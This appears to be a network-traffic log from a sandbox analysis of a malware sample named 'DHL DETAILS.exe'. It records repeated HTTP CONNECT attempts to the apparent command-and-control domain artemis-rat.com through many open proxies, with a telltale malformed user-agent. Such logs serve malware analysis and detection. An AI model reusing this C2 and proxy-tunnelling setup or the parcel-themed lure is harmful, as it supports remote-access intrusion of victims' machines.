                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    290192.168.2.550944192.163.201.131431006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.293375969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.770554066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.317483902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.395622015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.537050009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724272966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    291192.168.2.550607120.197.40.21990026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.295053005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.718941927 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    292192.168.2.55099850.63.12.33585076352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.295381069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.770566940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.301875114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.364388943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536890030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724226952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    293192.168.2.550950192.163.202.88475856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.295398951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.754955053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.286267042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.348756075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567843914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    294192.168.2.551024104.25.244.70806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.296264887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.452306032 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    295192.168.2.55090938.162.3.17531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.297059059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.718607903 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    296192.168.2.551026104.16.105.182806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.297190905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.453845024 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    297192.168.2.550788220.248.70.23790026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.298135996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.626190901 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    298192.168.2.55100834.49.208.221806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.305011988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    299192.168.2.55079062.33.53.24831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.317584991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    300192.168.2.550771139.99.148.9031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.317667007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.680694103 CET536INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3711
                                                                                    X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                                    X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                                    X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                                    Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-/


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    301192.168.2.550942157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.320249081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    302192.168.2.550878184.178.172.1441456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.321254015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    303192.168.2.550748222.220.102.15980006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.322542906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.709717989 CET705INHTTP/1.1 502 Bad Gateway
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 556
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    304192.168.2.551047104.18.254.76806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.323355913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.477770090 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    305192.168.2.550747114.79.148.218806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.331516027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.129949093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.317523003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.724349976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.536446095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.286298037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146239996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    306192.168.2.551077104.21.85.109806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.337836027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.492299080 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    307192.168.2.550908132.226.7.23302776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.340614080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
